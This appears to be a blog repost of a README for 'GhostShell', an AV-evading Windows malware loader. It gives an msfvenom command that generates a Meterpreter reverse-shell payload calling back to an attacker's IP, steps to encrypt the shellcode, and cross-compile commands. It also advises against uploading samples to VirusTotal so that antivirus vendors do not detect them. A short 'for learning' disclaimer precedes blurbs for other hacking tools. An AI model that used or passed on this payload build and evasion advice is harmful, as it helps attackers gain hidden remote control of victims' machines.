GhostShell is a Malware indetectable, with AV bypass techniques, anti-disassembly, etc. In this malware, are used some techniques to try bypass the AVs, VMs, and Sandboxes, with only porpuse to learning more. I’m not responsible for your actions.
Attention!!!
To check if the antivirus is detecting the malware, NEVER send it to the virustotal, IT WILL BE SENT TO THE ANTIVIRUS COMPANIES AND WILL BE BROKEN, to analyze, send it to https://www.hybrid-analysis.com/ and remember to check the option “Do not send my sample to non-affiliated third parties”, as in the example below.
Also Read – Faraday : Collaborative Penetration Test & Vulnerability Management Platform
Bypass Techniques
Generating the Shellcode
To generate the shellcode type in the terminal: msfvenom -p windows/meterpreter/reverse_shell lhost=(IP) lport=(PORT) -f c
, copy the shellcode generated and encrypt it.
./encrypt_shellcode e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(shellcode)""
encrypt_shellcode.exe e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(YOUR_SHELLCODE)""
How to compile for Windows on Linux?
To compile for Windows on Linux, first, install mingw-w64: sudo apt-get install mingw-w64
, then, to compile for 32 bits: i686-w64-mingw32-gcc -o main.exe main.c -l psapi -static
, and to 64 bits: x86_64-w64-mingw32 -o main.exe main.c -l psapi -static
This repository contains tools created by yogSahare0 while learning Python 3 for ethical hacking and penetration testing.…
"NetSecChallenger" provides a suite of automated tools designed for security professionals and network administrators to…
The essential tool for cybersecurity enthusiasts! This guide provides a detailed walkthrough on how to…
Meet "Poodone," the ultimate Python script designed for cybersecurity enthusiasts and professionals alike. Packed with…
The Linux version is no longer supported! The last Linux version is 6.0 that you…
Jin is a hacking command-line tools designed to make your scan port, gathering urls, check…